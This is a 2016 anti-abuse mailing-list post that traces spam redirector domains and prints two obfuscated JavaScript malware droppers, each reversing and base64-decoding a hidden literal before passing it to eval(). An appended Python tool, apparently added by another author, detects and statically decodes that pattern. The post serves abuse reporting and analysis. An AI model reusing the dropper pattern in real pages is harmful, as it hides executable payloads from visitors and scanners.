[anti-abuse-wg] Malware/ransomware current live distribution IPs
Ronald F. Guilmette
rfg at tristatelogic.com
Thu Jun 30 23:45:00 CEST 2016
In message <15749.1467320923 at server1.tristatelogic.com>, I wrote:

>Anyway, following the link in the above spam payload/body gets you to
>a trivial redirector... kindly hosted by Godaddy... which then attempts
>to take you to this new URL:
>
> http://gooodweightlossgood.com/?a=388338&c=wl_con&s=33
>
>There is another redirection once you get there.

The additional redirection takes you to:

http://372-beauty.gooodweightlossgood.com/us/newd/scux/cla-safflower-oil/

Note however that the content being served up here is *only* an advert
for a useless diet supplement (CLA Safflower Oil)... *not* a hunk of
Javascript malware.

I have yet to figure this out exactly. Some of the time, these sites
serve up unambiguous (and heavily encoded) Javascript malware. (See
below.) Other times, they don't. I confess that I haven't figured out
the pattern yet, or even whether it is a time-dependent thing.

Regards,
rfg

malware sample 1:
==============================================================================
<!DOCTYPE html>
<html>
<head>
<script language="javascript" type="text/javascript">
var _1Ol='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';
function _0l0(data){
    // Standard base64 alphabet; '=' (index 64) marks padding.
    var OOIlOI="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc='';
    do{
        // Read four base64 digits and pack them into 24 bits.
        h1=OOIlOI.indexOf(data.charAt(i++));
        h2=OOIlOI.indexOf(data.charAt(i++));
        h3=OOIlOI.indexOf(data.charAt(i++));
        h4=OOIlOI.indexOf(data.charAt(i++));
        bits=h1<<18|h2<<12|h3<<6|h4;
        // Split the 24 bits back into up to three output bytes.
        o1=bits>>16&0xff;
        o2=bits>>8&0xff;
        o3=bits&0xff;
        if(h3==64){enc+=String.fromCharCode(o1)}
        else if(h4==64){enc+=String.fromCharCode(o1,o2)}
        else{enc+=String.fromCharCode(o1,o2,o3)}
    }while(i<data.length);
    return enc
}
// Reverses a string character by character.
function OOI(string){
    var ret = '', i = 0;
    for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);}
    return ret;
}
// The payload is stored reversed and base64-encoded; undo both, then execute it.
eval(_0l0(OOI(_1Ol)));
</script>
</head>
<body>
</body>
</html>
==============================================================================

Malware sample 2:
==============================================================================
<!DOCTYPE html>
<html>
<head>
<script language="javascript" type="text/javascript">
var I1O='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';
function OlI(data){
    // Same base64 decoder as sample 1, with the identifiers renamed.
    var _011lOI="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc='';
    do{
        h1=_011lOI.indexOf(data.charAt(i++));
        h2=_011lOI.indexOf(data.charAt(i++));
        h3=_011lOI.indexOf(data.charAt(i++));
        h4=_011lOI.indexOf(data.charAt(i++));
        bits=h1<<18|h2<<12|h3<<6|h4;
        o1=bits>>16&0xff;
        o2=bits>>8&0xff;
        o3=bits&0xff;
        if(h3==64){enc+=String.fromCharCode(o1)}
        else if(h4==64){enc+=String.fromCharCode(o1,o2)}
        else{enc+=String.fromCharCode(o1,o2,o3)}
    }while(i<data.length);
    return enc
}
// Reverses a string character by character.
function _011(string){
    var ret = '', i = 0;
    for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);}
    return ret;
}
// Reverse, base64-decode, then execute the recovered script.
eval(OlI(_011(I1O)));
</script>
</head>
<body>
</body>
</html>
==============================================================================
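One way a defender can read what a dropper of the shape shown above would hand to eval() without ever running it, as an added example (my code, not anything from the post or the samples): it assumes the pattern in both samples, a long base64 literal stored reversed and fed through reverse, decode and eval, and uses a constructed, harmless payload in place of the real one.

```python
import base64
import re

# Constructed stand-in for the dropper pattern on this page (not the real
# payload): the hidden script is base64-encoded and stored reversed, so the
# page runs eval(decode(reverse(literal))) when loaded.
INNER_SCRIPT = 'document.title = "decoded stage";'
SAMPLE_HTML = (
    '<html><head><script type="text/javascript">'
    "var _1Ol='" + base64.b64encode(INNER_SCRIPT.encode())[::-1].decode() + "';"
    "function _0l0(data){/* base64 decoder */}"
    "function OOI(s){/* string reverse */}"
    "eval(_0l0(OOI(_1Ol)));"
    "</script></head><body></body></html>"
)

# A long single-quoted literal made only of base64 alphabet characters.
LITERAL = re.compile(r"var\s+(\w+)\s*=\s*'([A-Za-z0-9+/=]{16,})'")
# eval() fed by two nested single-argument calls, as in both samples.
EVAL_CHAIN = re.compile(r"eval\(\s*\w+\(\s*\w+\(\s*\w+\s*\)\s*\)\s*\)")


def looks_like_staged_dropper(html):
    """True when the eval(f(g(x))) chain and a candidate literal coexist."""
    return bool(EVAL_CHAIN.search(html)) and bool(LITERAL.search(html))


def decode_stage(literal):
    """Undo the reverse step, then the base64 step.

    The samples' decoder is plain base64 emitting one JS character per byte
    via String.fromCharCode, so latin-1 reproduces its output exactly.
    Raises ValueError (binascii.Error) on a malformed literal."""
    return base64.b64decode(literal[::-1], validate=True).decode("latin-1")


def extract_stages(html):
    """Statically recover every decodable stage as {var_name: script_text}."""
    stages = {}
    for name, literal in LITERAL.findall(html):
        try:
            stages[name] = decode_stage(literal)
        except ValueError:
            continue  # not a valid reversed-base64 literal; skip it
    return stages


if __name__ == "__main__":
    print(looks_like_staged_dropper(SAMPLE_HTML))
    for name, text in extract_stages(SAMPLE_HTML).items():
        print(name, "->", text)
```

The recovered text is returned as a string for inspection or for feeding to a sandbox, never executed.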